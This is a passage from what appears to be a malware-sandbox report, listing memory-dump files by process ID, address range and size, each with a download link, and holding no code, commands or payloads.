memory/4680-215-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-228-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-224-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-225-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-371-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4680-229-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-230-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-231-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-232-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-233-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-234-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-222-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-236-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-235-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4680-227-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-245-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4680-214-0x00000000004088B5-mapping.dmp

Download
memory/4680-216-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-217-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-218-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-213-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4680-221-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4680-223-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/4688-504-0x0000000000EE0000-0x000000000124C000-memory.dmp

Filesize
3.4MB

Download
memory/4688-552-0x0000000000EE0000-0x000000000124C000-memory.dmp

Filesize
3.4MB

Download
memory/4688-523-0x0000000000EE0000-0x000000000124C000-memory.dmp

Filesize
3.4MB

Download
memory/4688-551-0x0000000000EE0000-0x000000000124C000-memory.dmp

Filesize
3.4MB

Download
memory/4860-267-0x0000000000000000-mapping.dmp

Download
memory/5008-266-0x0000000000000000-mapping.dmp

Download
memory/5012-265-0x0000000000000000-mapping.dmp

Download
memory/5036-316-0x0000000000000000-mapping.dmp

Download
memory/5040-124-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/5040-122-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/5040-121-0x0000000140003E0C-mapping.dmp

Download
memory/5040-321-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/5040-123-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/5040-120-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/5040-125-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/5108-146-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-147-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-138-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-137-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-140-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-157-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-135-0x0000000000000000-mapping.dmp

Download
memory/5108-141-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-220-0x0000000000AC0000-0x0000000000E2C000-memory.dmp

Filesize
3.4MB

Download
memory/5108-149-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-150-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-437-0x0000000000AC0000-0x0000000000E2C000-memory.dmp

Filesize
3.4MB

Download
memory/5108-202-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-203-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-201-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-200-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-199-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-450-0x0000000000AC0000-0x0000000000E2C000-memory.dmp

Filesize
3.4MB

Download
memory/5108-182-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-181-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-180-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-151-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-142-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-144-0x0000000000AC0000-0x0000000000E2C000-memory.dmp

Filesize
3.4MB

Download
memory/5108-145-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-139-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-166-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-165-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-164-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-154-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-148-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-257-0x0000000000AC0000-0x0000000000E2C000-memory.dmp

Filesize
3.4MB

Download
memory/5108-226-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-162-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-161-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-152-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-156-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-158-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-160-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5108-159-0x0000000077DE0000-0x0000000077F6E000-memory.dmp

Filesize
1.6MB

Download
memory/5272-704-0x0000000000000000-mapping.dmp

Download
memory/5284-705-0x0000000000000000-mapping.dmp

Download
memory/5300-707-0x0000000000000000-mapping.dmp

Download
memory/5300-1278-0x000001C2BBE09000-0x000001C2BBE0F000-memory.dmp

Filesize
24KB

Download
memory/5300-1280-0x000001C2BBE09000-0x000001C2BBE0F000-memory.dmp

Filesize
24KB

Download
memory/5300-983-0x000001C2BD020000-0x000001C2BD03C000-memory.dmp

Filesize
112KB

Download
memory/5380-708-0x0000000000000000-mapping.dmp

Download
memory/5428-713-0x0000000000000000-mapping.dmp

Download
memory/5492-716-0x0000000000000000-mapping.dmp

Download
memory/5512-718-0x0000000000000000-mapping.dmp

Download
memory/5544-720-0x0000000000000000-mapping.dmp

Download
memory/5560-721-0x0000000000000000-mapping.dmp

Download
memory/5608-727-0x0000000000000000-mapping.dmp

Download
memory/5624-728-0x0000000000000000-mapping.dmp

Download
memory/5640-729-0x0000000000000000-mapping.dmp

Download
memory/5656-730-0x0000000000000000-mapping.dmp

Download
memory/5672-731-0x0000000000000000-mapping.dmp

Download
memory/5688-732-0x0000000000000000-mapping.dmp

Download
memory/5704-733-0x0000000000000000-mapping.dmp

Download
memory/5724-734-0x0000000000000000-mapping.dmp

Download
memory/7892-1270-0x0000000000E50000-0x0000000000E5A000-memory.dmp

Filesize
40KB

Download
memory/7892-1255-0x0000000000A40000-0x0000000000A4C000-memory.dmp

Filesize
48KB

Download
memory/7892-1252-0x0000000000000000-mapping.dmp

Download
memory/8068-1281-0x0000000000000000-mapping.dmp

Download
memory/8120-1282-0x0000000000000000-mapping.dmp

Download
memory/8140-1283-0x00007FF7254914E0-mapping.dmp

Download
memory/8152-1284-0x0000000000000000-mapping.dmp

Download
memory/8204-1289-0x0000000000000000-mapping.dmp

Download
memory/8292-1294-0x00007FF70A4E25D0-mapping.dmp

Download
memory/8292-1298-0x00007FF709CF0000-0x00007FF70A4E4000-memory.dmp

Filesize
8.0MB

Download
memory/8292-1299-0x00007FF709CF0000-0x00007FF70A4E4000-memory.dmp

Filesize
8.0MB

Download
memory/104164-924-0x000000000ACC0000-0x000000000AD52000-memory.dmp

Filesize
584KB

Download
memory/104164-513-0x00000000057E0000-0x00000000057F2000-memory.dmp

Filesize
72KB

Download
memory/104164-991-0x000000000AE90000-0x000000000AEAE000-memory.dmp

Filesize
120KB

Download
memory/104164-926-0x000000000B960000-0x000000000BE5E000-memory.dmp

Filesize
5.0MB

Download
memory/104164-545-0x0000000007130000-0x000000000717B000-memory.dmp

Filesize
300KB

Download
memory/104164-925-0x000000000AD60000-0x000000000ADD6000-memory.dmp

Filesize
472KB

Download
memory/104164-525-0x00000000070F0000-0x000000000712E000-memory.dmp

Filesize
248KB

Download
memory/104164-555-0x0000000009850000-0x000000000995A000-memory.dmp

Filesize
1.0MB

Download
memory/104164-916-0x000000000AAB0000-0x000000000AB16000-memory.dmp

Filesize
408KB

Download
memory/104164-478-0x0000000009D50000-0x000000000A356000-memory.dmp

Filesize
6.0MB

Download
memory/104164-462-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/104164-913-0x000000000AF30000-0x000000000B45C000-memory.dmp

Filesize
5.2MB

Download
memory/104164-888-0x000000000A830000-0x000000000A9F2000-memory.dmp

Filesize
1.8MB

Download
memory/104164-378-0x000000000041972E-mapping.dmp

Download
memory/104380-409-0x0000000000000000-mapping.dmp

Download